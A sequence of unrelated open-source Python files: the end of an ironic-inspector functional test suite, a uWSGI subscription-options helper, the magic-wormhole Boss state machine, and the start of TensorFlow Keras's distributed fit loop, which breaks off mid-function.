[{'op': 'add', 'path': '/extra/foo', 'value': 'bar'}])
def test_conditions_scheme_actions_path(self):
rules = [
{
'conditions': [
{'field': 'node://properties.local_gb', 'op': 'eq',
'value': 40},
{'field': 'node://driver_info.ipmi_address', 'op': 'eq',
'value': self.bmc_address},
],
'actions': [
{'action': 'set-attribute', 'path': '/extra/foo',
'value': 'bar'}
]
},
{
'conditions': [
{'field': 'data://inventory.cpu.count', 'op': 'eq',
'value': self.data['inventory']['cpu']['count']},
],
'actions': [
{'action': 'set-attribute',
'path': '/driver_info/ipmi_address',
'value': '{data[inventory][bmc_address]}'}
]
}
]
for rule in rules:
self.call_add_rule(rule)
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.call_continue(self.data)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.patch_node.assert_any_call(
self.uuid,
[{'op': 'add', 'path': '/extra/foo', 'value': 'bar'}])
self.cli.patch_node.assert_any_call(
self.uuid,
[{'op': 'add', 'path': '/driver_info/ipmi_address',
'value': self.data['inventory']['bmc_address']}])
def test_root_device_hints(self):
self.node.properties['root_device'] = {'size': 20}
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.set_node_power_state.assert_called_once_with(self.uuid,
'rebooting')
status = self.call_get_status(self.uuid)
self.check_status(status, finished=False, state=istate.States.waiting)
res = self.call_continue(self.data)
self.assertEqual({'uuid': self.uuid}, res)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.assertCalledWithPatch(self.patch_root_hints, self.cli.patch_node)
self.cli.create_port.assert_called_once_with(
node_uuid=self.uuid, address='11:22:33:44:55:66', extra={},
is_pxe_enabled=True)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.finished)
def test_abort_introspection(self):
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.set_node_power_state.assert_called_once_with(self.uuid,
'rebooting')
status = self.call_get_status(self.uuid)
self.check_status(status, finished=False, state=istate.States.waiting)
res = self.call_abort_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.assertEqual(202, res.status_code)
status = self.call_get_status(self.uuid)
self.assertTrue(status['finished'])
self.assertEqual('Canceled by operator', status['error'])
# Note(mkovacik): we're checking just this doesn't pass OK as
# there might be either a race condition (hard to test) that
# yields a 'Node already finished.' or an attribute-based
# look-up error from some pre-processing hooks because
# node_info.finished() deletes the look-up attributes only
# after releasing the node lock
self.call('post', '/v1/continue', self.data, expect_error=400)
def test_stored_data_processing(self):
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.set_node_power_state.assert_called_once_with(self.uuid,
'rebooting')
res = self.call_continue(self.data)
self.assertEqual({'uuid': self.uuid}, res)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
status = self.call_get_status(self.uuid)
inspect_started_at = timeutils.parse_isotime(status['started_at'])
self.check_status(status, finished=True, state=istate.States.finished)
data = self.call_get_data(self.uuid)
self.assertEqual(self.data['inventory'], data['inventory'])
self.assertIn('all_interfaces', data)
raw = self.call_get_data(self.uuid, processed=False)
self.assertEqual(self.data['inventory'], raw['inventory'])
self.assertNotIn('all_interfaces', raw)
res = self.call_reapply(self.uuid)
self.assertEqual(202, res.status_code)
self.assertEqual('{}\n', res.text)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.finished)
# checks the started_at updated in DB is correct
reapply_started_at = timeutils.parse_isotime(status['started_at'])
self.assertLess(inspect_started_at, reapply_started_at)
# second reapply call
res = self.call_reapply(self.uuid)
self.assertEqual(202, res.status_code)
self.assertEqual('{}\n', res.text)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
# Reapply with provided data
new_data = copy.deepcopy(self.data)
new_data['inventory']['cpu']['count'] = 42
res = self.call_reapply(self.uuid, data=new_data)
self.assertEqual(202, res.status_code)
self.assertEqual('{}\n', res.text)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.check_status(status, finished=True, state=istate.States.finished)
data = self.call_get_data(self.uuid)
self.assertEqual(42, data['inventory']['cpu']['count'])
def test_edge_state_transitions(self):
"""Assert state transitions work as expected in edge conditions."""
# multiple introspect calls
self.call_introspect(self.uuid)
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=False, state=istate.States.waiting)
# an error -start-> starting state transition is possible
self.call_abort_introspect(self.uuid)
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=False, state=istate.States.waiting)
# double abort works
self.call_abort_introspect(self.uuid)
status = self.call_get_status(self.uuid)
error = status['error']
self.check_status(status, finished=True, state=istate.States.error,
error=error)
self.call_abort_introspect(self.uuid)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.error,
error=error)
# preventing stale data race condition
# waiting -> processing is a strict state transition
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
row = self.db_row()
row.state = istate.States.processing
with db.ensure_transaction() as session:
row.save(session)
self.call_continue(self.data, expect_error=400)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.error,
error=mock.ANY)
self.assertIn('no defined transition', status['error'])
# multiple reapply calls
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.call_continue(self.data)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.call_reapply(self.uuid)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.finished,
error=None)
self.call_reapply(self.uuid)
# assert an finished -reapply-> reapplying -> finished state transition
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.finished,
error=None)
def test_without_root_disk(self):
del self.data['root_disk']
self.inventory['disks'] = []
self.patch[-1] = {'path': '/properties/local_gb',
'value': '0', 'op': 'add'}
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.set_node_power_state.assert_called_once_with(self.uuid,
'rebooting')
status = self.call_get_status(self.uuid)
self.check_status(status, finished=False, state=istate.States.waiting)
res = self.call_continue(self.data)
self.assertEqual({'uuid': self.uuid}, res)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.patch_node.assert_called_with(self.uuid, mock.ANY)
self.assertCalledWithPatch(self.patch, self.cli.patch_node)
self.cli.create_port.assert_called_once_with(
node_uuid=self.uuid, extra={}, address='11:22:33:44:55:66',
is_pxe_enabled=True)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.finished)
def test_lldp_plugin(self):
self.call_introspect(self.uuid)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.set_node_power_state.assert_called_once_with(self.uuid,
'rebooting')
status = self.call_get_status(self.uuid)
self.check_status(status, finished=False, state=istate.States.waiting)
res = self.call_continue(self.data)
self.assertEqual({'uuid': self.uuid}, res)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.finished)
updated_data = self.call_get_data(self.uuid)
lldp_out = updated_data['all_interfaces']['eth1']
expected_chassis_id = "11:22:33:aa:bb:cc"
expected_port_id = "734"
self.assertEqual(expected_chassis_id,
lldp_out['lldp_processed']['switch_chassis_id'])
self.assertEqual(expected_port_id,
lldp_out['lldp_processed']['switch_port_id'])
def test_update_unknown_active_node(self):
cfg.CONF.set_override('permit_active_introspection', True,
'processing')
self.node.provision_state = 'active'
self.cli.ports.return_value = [
mock.Mock(address='11:22:33:44:55:66', node_id=self.node.uuid)
]
# NOTE(dtantsur): we're not starting introspection in this test.
res = self.call_continue(self.data)
self.assertEqual({'uuid': self.uuid}, res)
eventlet.greenthread.sleep(DEFAULT_SLEEP)
self.cli.patch_node.assert_called_with(self.uuid, mock.ANY)
self.assertCalledWithPatch(self.patch, self.cli.patch_node)
self.assertFalse(self.cli.create_port.called)
self.assertFalse(self.cli.set_node_boot_device.called)
status = self.call_get_status(self.uuid)
self.check_status(status, finished=True, state=istate.States.finished)
def test_update_known_active_node(self):
# Start with a normal introspection as a pre-requisite
self.test_bmc()
self.cli.patch_node.reset_mock()
self.cli.set_node_boot_device.reset_mock()
self.cli.create_port.reset_mock()
# Provide some updates
self.data['inventory']['memory']['physical_mb'] = 16384
self.patch = [
{'op': 'add', 'path': '/properties/cpus', 'value': '4'},
{'path': '/properties/cpu_arch', 'value': 'x86_64', 'op': 'add'},
{'op': 'add', 'path': '/properties/memory_mb', 'value': '16384'},
{'path': '/properties/local_gb', 'value': '999', 'op': 'add'}
]
# Then continue with active node test
self.test_update_unknown_active_node()
@contextlib.contextmanager
def mocked_server():
conf_file = get_test_conf_file()
dbsync.main(args=['--config-file', conf_file, 'upgrade'])
cfg.CONF.reset()
cfg.CONF.unregister_opt(dbsync.command_opt)
eventlet.greenthread.spawn_n(inspector_cmd.main,
args=['--config-file', conf_file])
eventlet.greenthread.sleep(1)
# Wait for service to start up to 30 seconds
for i in range(10):
try:
requests.get('http://127.0.0.1:5050/v1')
except requests.ConnectionError:
if i == 9:
raise
print('Service did not start yet')
eventlet.greenthread.sleep(3)
else:
break
# start testing
yield
# Make sure all processes finished executing
eventlet.greenthread.sleep(1)
if __name__ == '__main__':
if len(sys.argv) > 1:
test_name = sys.argv[1]
else:
test_name = None
with mocked_server():
unittest.main(verbosity=2, defaultTest=test_name)
|
|
from ..base import OptionsGroup
from ..exceptions import ConfigurationError
from ..utils import KeyValue, filter_locals
from .subscriptions_algos import *
class Subscriptions(OptionsGroup):
"""
This allows some uWSGI instances to announce their presence to subscriptions managing server,
which in its turn can address those nodes (e.g. delegate request processing to them)
and automatically remove dead nodes from the pool.
Some routers provide subscription server functionality. See `.routing.routers`.
.. note:: Subscription system in many ways relies on Master Process.
.. warning:: The subscription system is meant for "trusted" networks.
All of the nodes in your network can potentially make a total mess with it.
* http://uwsgi.readthedocs.io/en/latest/SubscriptionServer.html
"""
class algorithms:
"""Balancing algorithms available to use with ``subscribe``."""
ip_hash = IpHash
least_reference_count = LeastReferenceCount
weighted_least_reference_count = WeightedLeastReferenceCount
weighted_round_robin = WeightedRoundRobin
def set_server_params(
self, *, client_notify_address=None, mountpoints_depth=None, require_vassal=None,
tolerance=None, tolerance_inactive=None, key_dot_split=None):
"""Sets subscription server related params.
:param str client_notify_address: Set the notification socket for subscriptions.
When you subscribe to a server, you can ask it to "acknowledge" the acceptance of your request.
pointing address (Unix socket or UDP), on which your instance will bind and
the subscription server will send acknowledgements to.
:param int mountpoints_depth: Enable support of mountpoints of certain depth for subscription system.
* http://uwsgi-docs.readthedocs.io/en/latest/SubscriptionServer.html#mountpoints-uwsgi-2-1
:param bool require_vassal: Require a vassal field (see ``subscribe``) from each subscription.
:param int tolerance: Subscription reclaim tolerance (seconds).
:param int tolerance_inactive: Subscription inactivity tolerance (seconds).
:param bool key_dot_split: Try to fallback to the next part in (dot based) subscription key.
Used, for example, in SNI.
"""
# todo notify-socket (fallback) relation
self._set('subscription-notify-socket', client_notify_address)
self._set('subscription-mountpoint', mountpoints_depth)
self._set('subscription-vassal-required', require_vassal, cast=bool)
self._set('subscription-tolerance', tolerance)
self._set('subscription-tolerance-inactive', tolerance_inactive)
self._set('subscription-dotsplit', key_dot_split, cast=bool)
return self._section
def set_server_verification_params(
self, *, digest_algo=None, dir_cert=None, tolerance=None, no_check_uid=None,
dir_credentials=None, pass_unix_credentials=None):
"""Sets peer verification params for subscription server.
These are for secured subscriptions.
:param str digest_algo: Digest algorithm. Example: SHA1
.. note:: Also requires ``dir_cert`` to be set.
:param str dir_cert: Certificate directory.
.. note:: Also requires ``digest_algo`` to be set.
:param int tolerance: Maximum tolerance (in seconds) of clock skew for secured subscription system.
Default: 24h.
:param str|int|list[str|int] no_check_uid: Skip signature check for the specified uids
when using unix sockets credentials.
:param str|list[str] dir_credentials: Directories to search for subscriptions
key credentials.
:param bool pass_unix_credentials: Enable management of SCM_CREDENTIALS in subscriptions UNIX sockets.
"""
if digest_algo and dir_cert:
self._set('subscriptions-sign-check', f'{digest_algo}:{dir_cert}')
self._set('subscriptions-sign-check-tolerance', tolerance)
self._set('subscriptions-sign-skip-uid', no_check_uid, multi=True)
self._set('subscriptions-credentials-check', dir_credentials, multi=True)
self._set('subscriptions-use-credentials', pass_unix_credentials, cast=bool)
return self._section
def set_client_params(
self, *, start_unsubscribed=None, clear_on_exit=None, unsubscribe_on_reload=None,
announce_interval=None):
"""Sets subscribers related params.
:param bool start_unsubscribed: Configure subscriptions but do not send them.
.. note:: Useful with master FIFO.
:param bool clear_on_exit: Force clear instead of unsubscribe during shutdown.
:param bool unsubscribe_on_reload: Force unsubscribe request even during graceful reload.
:param int announce_interval: Send subscription announce at the specified interval. Default: 10 master cycles.
"""
self._set('start-unsubscribed', start_unsubscribed, cast=bool)
self._set('subscription-clear-on-shutdown', clear_on_exit, cast=bool)
self._set('unsubscribe-on-graceful-reload', unsubscribe_on_reload, cast=bool)
self._set('subscribe-freq', announce_interval)
return self._section
def subscribe(
self, server=None, *, key=None, address=None, address_vassal=None,
balancing_weight=None, balancing_algo=None, modifier=None, signing=None, check_file=None, protocol=None,
sni_cert=None, sni_key=None, sni_client_ca=None):
"""Registers a subscription intent.
:param str server: Subscription server address (UDP or UNIX socket).
Examples:
* 127.0.0.1:7171
:param str key: Key to subscribe. Generally the domain name (+ optional '/< mountpoint>').
Examples:
* mydomain.it/foo
* mydomain.it/foo/bar (requires ``mountpoints_depth=2``)
* mydomain.it
* ubuntu64.local:9090
:param str|int address: Address to subscribe (the value for the key)
or zero-based internal socket number (integer).
:param str address: Vassal node address.
:param int balancing_weight: Load balancing value. Default: 1.
:param balancing_algo: Load balancing algorithm to use. See ``balancing_algorithms``
.. note:: Since 2.1
:param Modifier modifier: Routing modifier object. See ``.routing.modifiers``
:param list|tuple signing: Signing basics, expects two elements list/tuple:
(signing_algorithm, key).
Examples:
* SHA1:idlessh001
:param str check_file: If this file exists the subscription packet is sent,
otherwise it is skipped.
:param str protocol: the protocol to use, by default it is ``uwsgi``.
See ``.networking.socket_types``.
.. note:: Since 2.1
:param str sni_cert: Certificate file to use for SNI proxy management.
* http://uwsgi.readthedocs.io/en/latest/SNI.html#subscription-system-and-sni
:param str sni_key: sni_key Key file to use for SNI proxy management.
* http://uwsgi.readthedocs.io/en/latest/SNI.html#subscription-system-and-sni
:param str sni_client_ca: Ca file to use for SNI proxy management.
* http://uwsgi.readthedocs.io/en/latest/SNI.html#subscription-system-and-sni
"""
# todo params: inactive (inactive slot activation)
if not any((server, key)):
raise ConfigurationError('Subscription requires `server` or `key` to be set.')
address_key = 'addr'
if isinstance(address, int):
address_key = 'socket'
if balancing_algo:
backup = getattr(balancing_algo, 'backup_level', None)
if signing:
signing = ':'.join(signing)
if modifier:
modifier1 = modifier
if modifier.submod:
modifier2 = modifier.submod
rule = KeyValue(
filter_locals(locals(), drop=['address_key', 'modifier']),
aliases={
'address': address_key,
'address_vassal': 'vassal',
'signing': 'sign',
'check_file': 'check',
'balancing_weight': 'weight',
'balancing_algo': 'algo',
'protocol': 'proto',
'sni_cert': 'sni_crt',
'sni_client_ca': 'sni_ca',
},
)
self._set('subscribe2', rule)
return self._section
|
|
from __future__ import absolute_import, print_function, unicode_literals
import re
import six
from attr import attrib, attrs
from attr.validators import instance_of, optional, provides
from automat import MethodicalMachine
from twisted.python import log
from zope.interface import implementer
from . import _interfaces
from ._allocator import Allocator
from ._code import Code, validate_code
from ._dilation.manager import Dilator
from ._input import Input
from ._key import Key
from ._lister import Lister
from ._mailbox import Mailbox
from ._nameplate import Nameplate
from ._order import Order
from ._receive import Receive
from ._rendezvous import RendezvousConnector
from ._send import Send
from ._terminator import Terminator
from ._wordlist import PGPWordList
from .errors import (LonelyError, OnlyOneCodeError, ServerError, WelcomeError,
WrongPasswordError, _UnknownPhaseError)
from .util import bytes_to_dict
@attrs
@implementer(_interfaces.IBoss)
class Boss(object):
_W = attrib()
_side = attrib(validator=instance_of(type(u"")))
_url = attrib(validator=instance_of(type(u"")))
_appid = attrib(validator=instance_of(type(u"")))
_versions = attrib(validator=instance_of(dict))
_client_version = attrib(validator=instance_of(tuple))
_reactor = attrib()
_eventual_queue = attrib()
_cooperator = attrib()
_journal = attrib(validator=provides(_interfaces.IJournal))
_tor = attrib(validator=optional(provides(_interfaces.ITorManager)))
_timing = attrib(validator=provides(_interfaces.ITiming))
m = MethodicalMachine()
set_trace = getattr(m, "_setTrace",
lambda self, f: None) # pragma: no cover
def __attrs_post_init__(self):
self._build_workers()
self._init_other_state()
def _build_workers(self):
self._N = Nameplate()
self._M = Mailbox(self._side)
self._S = Send(self._side, self._timing)
self._O = Order(self._side, self._timing)
self._K = Key(self._appid, self._versions, self._side, self._timing)
self._R = Receive(self._side, self._timing)
self._RC = RendezvousConnector(self._url, self._appid, self._side,
self._reactor, self._journal, self._tor,
self._timing, self._client_version)
self._L = Lister(self._timing)
self._A = Allocator(self._timing)
self._I = Input(self._timing)
self._C = Code(self._timing)
self._T = Terminator()
self._D = Dilator(self._reactor, self._eventual_queue,
self._cooperator)
self._N.wire(self._M, self._I, self._RC, self._T)
self._M.wire(self._N, self._RC, self._O, self._T)
self._S.wire(self._M)
self._O.wire(self._K, self._R)
self._K.wire(self, self._M, self._R)
self._R.wire(self, self._S)
self._RC.wire(self, self._N, self._M, self._A, self._L, self._T)
self._L.wire(self._RC, self._I)
self._A.wire(self._RC, self._C)
self._I.wire(self._C, self._L)
self._C.wire(self, self._A, self._N, self._K, self._I)
self._T.wire(self, self._RC, self._N, self._M, self._D)
self._D.wire(self._S, self._T)
def _init_other_state(self):
self._did_start_code = False
self._next_tx_phase = 0
self._next_rx_phase = 0
self._rx_phases = {} # phase -> plaintext
self._next_rx_dilate_seqnum = 0
self._rx_dilate_seqnums = {} # seqnum -> plaintext
self._result = "empty"
# these methods are called from outside
def start(self):
self._RC.start()
def _print_trace(self, old_state, input, new_state, client_name, machine,
file):
if new_state:
print(
"%s.%s[%s].%s -> [%s]" % (client_name, machine, old_state,
input, new_state),
file=file)
else:
# the RendezvousConnector emits message events as if
# they were state transitions, except that old_state
# and new_state are empty strings. "input" is one of
# R.connected, R.rx(type phase+side), R.tx(type
# phase), R.lost .
print("%s.%s.%s" % (client_name, machine, input), file=file)
file.flush()
def output_tracer(output):
print(" %s.%s.%s()" % (client_name, machine, output), file=file)
file.flush()
return output_tracer
def _set_trace(self, client_name, which, file):
names = {
"B": self,
"N": self._N,
"M": self._M,
"S": self._S,
"O": self._O,
"K": self._K,
"SK": self._K._SK,
"R": self._R,
"RC": self._RC,
"L": self._L,
"A": self._A,
"I": self._I,
"C": self._C,
"T": self._T
}
for machine in which.split():
t = (lambda old_state, input, new_state, machine=machine:
self._print_trace(old_state, input, new_state,
client_name=client_name,
machine=machine, file=file))
names[machine].set_trace(t)
if machine == "I":
self._I.set_debug(t)
# def serialize(self):
# raise NotImplemented
# and these are the state-machine transition functions, which don't take
# args
@m.state(initial=True)
def S0_empty(self):
pass # pragma: no cover
@m.state()
def S1_lonely(self):
pass # pragma: no cover
@m.state()
def S2_happy(self):
pass # pragma: no cover
@m.state()
def S3_closing(self):
pass # pragma: no cover
@m.state(terminal=True)
def S4_closed(self):
pass # pragma: no cover
# from the Wormhole
# input/allocate/set_code are regular methods, not state-transition
# inputs. We expect them to be called just after initialization, while
# we're in the S0_empty state. You must call exactly one of them, and the
# call must happen while we're in S0_empty, which makes them good
# candidates for being a proper @m.input, but set_code() will immediately
# (reentrantly) cause self.got_code() to be fired, which is messy. These
# are all passthroughs to the Code machine, so one alternative would be
# to have Wormhole call Code.{input,allocate,set_code} instead, but that
# would require the Wormhole to be aware of Code (whereas right now
# Wormhole only knows about this Boss instance, and everything else is
# hidden away).
def input_code(self):
if self._did_start_code:
raise OnlyOneCodeError()
self._did_start_code = True
return self._C.input_code()
def allocate_code(self, code_length):
if self._did_start_code:
raise OnlyOneCodeError()
self._did_start_code = True
wl = PGPWordList()
self._C.allocate_code(code_length, wl)
def set_code(self, code):
validate_code(code) # can raise KeyFormatError
if self._did_start_code:
raise OnlyOneCodeError()
self._did_start_code = True
self._C.set_code(code)
def dilate(self, transit_relay_location=None, no_listen=False):
return self._D.dilate(transit_relay_location, no_listen=no_listen) # fires with endpoints
@m.input()
def send(self, plaintext):
pass
@m.input()
def close(self):
pass
# from RendezvousConnector:
# * "rx_welcome" is the Welcome message, which might signal an error, or
# our welcome_handler might signal one
# * "rx_error" is error message from the server (probably because of
# something we said badly, or due to CrowdedError)
# * "error" is when an exception happened while it tried to deliver
# something else
def rx_welcome(self, welcome):
try:
if "error" in welcome:
raise WelcomeError(welcome["error"])
# TODO: it'd be nice to not call the handler when we're in
# S3_closing or S4_closed states. I tried to implement this with
# rx_welcome as an @input, but in the error case I'd be
# delivering a new input (rx_error or something) while in the
# middle of processing the rx_welcome input, and I wasn't sure
# Automat would handle that correctly.
self._W.got_welcome(welcome) # TODO: let this raise WelcomeError?
except WelcomeError as welcome_error:
self.rx_unwelcome(welcome_error)
@m.input()
def rx_unwelcome(self, welcome_error):
pass
@m.input()
def rx_error(self, errmsg, orig):
pass
@m.input()
def error(self, err):
pass
# from Code (provoked by input/allocate/set_code)
@m.input()
def got_code(self, code):
pass
# Key sends (got_key, scared)
# Receive sends (got_message, happy, got_verifier, scared)
@m.input()
def happy(self):
pass
@m.input()
def scared(self):
pass
def got_message(self, phase, plaintext):
assert isinstance(phase, type("")), type(phase)
assert isinstance(plaintext, type(b"")), type(plaintext)
d_mo = re.search(r'^dilate-(\d+)$', phase)
if phase == "version":
self._got_version(plaintext)
elif d_mo:
self._got_dilate(int(d_mo.group(1)), plaintext)
elif re.search(r'^\d+$', phase):
self._got_phase(int(phase), plaintext)
else:
# Ignore unrecognized phases, for forwards-compatibility. Use
# log.err so tests will catch surprises.
log.err(_UnknownPhaseError("received unknown phase '%s'" % phase))
@m.input()
def _got_version(self, plaintext):
pass
@m.input()
def _got_phase(self, phase, plaintext):
pass
@m.input()
def _got_dilate(self, seqnum, plaintext):
pass
@m.input()
def got_key(self, key):
pass
@m.input()
def got_verifier(self, verifier):
pass
# Terminator sends closed
@m.input()
def closed(self):
pass
@m.output()
def do_got_code(self, code):
self._W.got_code(code)
@m.output()
def process_version(self, plaintext):
# most of this is wormhole-to-wormhole, ignored for now
# in the future, this is how Dilation is signalled
self._their_versions = bytes_to_dict(plaintext)
self._D.got_wormhole_versions(self._their_versions)
# but this part is app-to-app
app_versions = self._their_versions.get("app_versions", {})
self._W.got_versions(app_versions)
@m.output()
def S_send(self, plaintext):
assert isinstance(plaintext, type(b"")), type(plaintext)
phase = self._next_tx_phase
self._next_tx_phase += 1
self._S.send("%d" % phase, plaintext)
@m.output()
def close_unwelcome(self, welcome_error):
# assert isinstance(err, WelcomeError)
self._result = welcome_error
self._T.close("unwelcome")
@m.output()
def close_error(self, errmsg, orig):
self._result = ServerError(errmsg)
self._T.close("errory")
@m.output()
def close_scared(self):
self._result = WrongPasswordError()
self._T.close("scary")
@m.output()
def close_lonely(self):
self._result = LonelyError()
self._T.close("lonely")
@m.output()
def close_happy(self):
self._result = "happy"
self._T.close("happy")
@m.output()
def W_got_key(self, key):
self._W.got_key(key)
@m.output()
def D_got_key(self, key):
self._D.got_key(key)
@m.output()
def W_got_verifier(self, verifier):
self._W.got_verifier(verifier)
@m.output()
def W_received(self, phase, plaintext):
assert isinstance(phase, six.integer_types), type(phase)
# we call Wormhole.received() in strict phase order, with no gaps
self._rx_phases[phase] = plaintext
while self._next_rx_phase in self._rx_phases:
self._W.received(self._rx_phases.pop(self._next_rx_phase))
self._next_rx_phase += 1
@m.output()
def D_received_dilate(self, seqnum, plaintext):
assert isinstance(seqnum, six.integer_types), type(seqnum)
# strict phase order, no gaps
self._rx_dilate_seqnums[seqnum] = plaintext
while self._next_rx_dilate_seqnum in self._rx_dilate_seqnums:
m = self._rx_dilate_seqnums.pop(self._next_rx_dilate_seqnum)
self._D.received_dilate(m)
self._next_rx_dilate_seqnum += 1
@m.output()
def W_close_with_error(self, err):
self._result = err # exception
self._W.closed(self._result)
@m.output()
def W_closed(self):
# result is either "happy" or a WormholeError of some sort
self._W.closed(self._result)
S0_empty.upon(close, enter=S3_closing, outputs=[close_lonely])
S0_empty.upon(send, enter=S0_empty, outputs=[S_send])
S0_empty.upon(rx_unwelcome, enter=S3_closing, outputs=[close_unwelcome])
S0_empty.upon(got_code, enter=S1_lonely, outputs=[do_got_code])
S0_empty.upon(rx_error, enter=S3_closing, outputs=[close_error])
S0_empty.upon(error, enter=S4_closed, outputs=[W_close_with_error])
S1_lonely.upon(rx_unwelcome, enter=S3_closing, outputs=[close_unwelcome])
S1_lonely.upon(happy, enter=S2_happy, outputs=[])
S1_lonely.upon(scared, enter=S3_closing, outputs=[close_scared])
S1_lonely.upon(close, enter=S3_closing, outputs=[close_lonely])
S1_lonely.upon(send, enter=S1_lonely, outputs=[S_send])
S1_lonely.upon(got_key, enter=S1_lonely, outputs=[W_got_key, D_got_key])
S1_lonely.upon(rx_error, enter=S3_closing, outputs=[close_error])
S1_lonely.upon(error, enter=S4_closed, outputs=[W_close_with_error])
S2_happy.upon(rx_unwelcome, enter=S3_closing, outputs=[close_unwelcome])
S2_happy.upon(got_verifier, enter=S2_happy, outputs=[W_got_verifier])
S2_happy.upon(_got_phase, enter=S2_happy, outputs=[W_received])
S2_happy.upon(_got_version, enter=S2_happy, outputs=[process_version])
S2_happy.upon(_got_dilate, enter=S2_happy, outputs=[D_received_dilate])
S2_happy.upon(scared, enter=S3_closing, outputs=[close_scared])
S2_happy.upon(close, enter=S3_closing, outputs=[close_happy])
S2_happy.upon(send, enter=S2_happy, outputs=[S_send])
S2_happy.upon(rx_error, enter=S3_closing, outputs=[close_error])
S2_happy.upon(error, enter=S4_closed, outputs=[W_close_with_error])
S3_closing.upon(rx_unwelcome, enter=S3_closing, outputs=[])
S3_closing.upon(rx_error, enter=S3_closing, outputs=[])
S3_closing.upon(got_verifier, enter=S3_closing, outputs=[])
S3_closing.upon(_got_phase, enter=S3_closing, outputs=[])
S3_closing.upon(_got_version, enter=S3_closing, outputs=[])
S3_closing.upon(_got_dilate, enter=S3_closing, outputs=[])
S3_closing.upon(happy, enter=S3_closing, outputs=[])
S3_closing.upon(scared, enter=S3_closing, outputs=[])
S3_closing.upon(close, enter=S3_closing, outputs=[])
S3_closing.upon(send, enter=S3_closing, outputs=[])
S3_closing.upon(closed, enter=S4_closed, outputs=[W_closed])
S3_closing.upon(error, enter=S4_closed, outputs=[W_close_with_error])
S4_closed.upon(rx_unwelcome, enter=S4_closed, outputs=[])
S4_closed.upon(got_verifier, enter=S4_closed, outputs=[])
S4_closed.upon(_got_phase, enter=S4_closed, outputs=[])
S4_closed.upon(_got_version, enter=S4_closed, outputs=[])
S4_closed.upon(_got_dilate, enter=S4_closed, outputs=[])
S4_closed.upon(happy, enter=S4_closed, outputs=[])
S4_closed.upon(scared, enter=S4_closed, outputs=[])
S4_closed.upon(close, enter=S4_closed, outputs=[])
S4_closed.upon(send, enter=S4_closed, outputs=[])
S4_closed.upon(error, enter=S4_closed, outputs=[])
|
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Part of the Keras training engine related to distributed training.
"""
# pylint: disable=protected-access
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors
from tensorflow.python.keras import backend as K
from tensorflow.python.keras import callbacks as cbks
from tensorflow.python.keras import optimizers
from tensorflow.python.keras.engine import distributed_training_utils
from tensorflow.python.keras.utils.generic_utils import Progbar
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import distribute as distribute_lib
# TODO(priyag, sourabhbajaj): Refactor this file to address code duplication.
def fit_loop(
model,
iterator,
epochs=100,
verbose=1,
callbacks=None,
val_iterator=None,
initial_epoch=0,
steps_per_epoch=None,
validation_steps=None):
"""Fit loop for training with DistributionStrategy.
Arguments:
model: Keras Model instance.
iterator: Iterator for input data.
epochs: Number of times to iterate over the data
verbose: Integer, Verbosity mode, 0, 1 or 2
callbacks: List of callbacks to be called during training
val_iterator: Iterator for validation data.
initial_epoch: Epoch at which to start training
(useful for resuming a previous training run)
steps_per_epoch: Total number of steps (batches of samples)
before declaring one epoch finished and starting the
next epoch. Ignored with the default value of `None`.
validation_steps: Number of steps to run validation for
(only if doing validation from data tensors).
Ignored with the default value of `None`.
Returns:
`History` object.
Raises:
ValueError: in case of invalid arguments.
"""
current_strategy = model._distribution_strategy
# TODO(priyag, sourabhbajaj): Remove this when the codepaths are merged.
if current_strategy.__class__.__name__ == 'TPUStrategy':
return _experimental_fit_loop(
model, iterator, epochs, verbose, callbacks, initial_epoch,
steps_per_epoch)
if not model._grouped_model:
clone_model_on_towers(model, current_strategy, make_callback_model=True)
def _per_device_train_function(model):
model._make_train_function()
return (model.train_function.inputs,
model.train_function.outputs,
model.train_function.updates_op,
model.train_function.session_kwargs)
inputs, targets = _get_input_from_iterator(iterator, model)
